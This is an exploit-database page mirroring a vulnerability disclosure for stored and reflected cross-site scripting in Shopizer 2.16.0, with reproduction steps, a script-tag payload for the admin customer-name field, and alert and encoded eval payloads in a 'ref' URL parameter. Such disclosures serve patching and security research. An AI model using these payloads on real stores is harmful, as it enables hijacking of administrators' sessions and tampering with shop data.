Advertisement






Shopizer 2.16.0 Multiple Cross-Site Scripting (XSS)

CVE Category Price Severity
CVE-2021-33561 CWE-79 $5,000 High
Author Risk Exploitation Type Date
Raj Sharma High Remote 2021-06-02
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.0148 0.31742

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060013

Below is a copy:

Shopizer 2.16.0 Multiple Cross-Site Scripting (XSS)
# Exploit Title: Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 23-05-2021
# Exploit Author: Marek Toth 
# Vendor Homepage: https://www.shopizer.com
# Software Link: https://github.com/shopizer-ecommerce/shopizer
# Version: <= 2.16.0
# CVE: CVE-2021-33561, CVE-2021-33562

Stored XSS - 'customer_name' Administration 

Description:
A stored cross-site scripting (XSS) vulnerability in Shopizer before version 2.17.0 allows remote attackers to inject arbitrary web script or HTML via customer_name in various forms of store administration and saved in the database. The code is executed for any user of store administration when information is fetched from backend.

Steps to reproduce:
1. Open "http://example.com/admin/" and login to the administration
2. Open "Customers" (http://example.com/admin/customers/list.html) and click on the "Details" button
3. Change customer name to <script>alert(1)</script> and save it
4. Open "Customers" -> XSS payload will trigger

Except "Customers" section, XSS will be executed in "Orders" (/admin/orders/list.html) and "Recent orders" (/admin/home.html)

Reflected XSS - 'ref' parameter 

Description:
A reflected cross-site scripting (XSS) vulnerability in Shopizer before version 2.17.0 allows remote attackers to inject arbitrary web script or HTML via the 'ref' parameter.

Payloads: 
'+alert(1)+'
'+eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))+'

PoC:
http://example.com/shop/product/vintage-bag-with-leather-bands.html/ref='+alert(1)+'

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum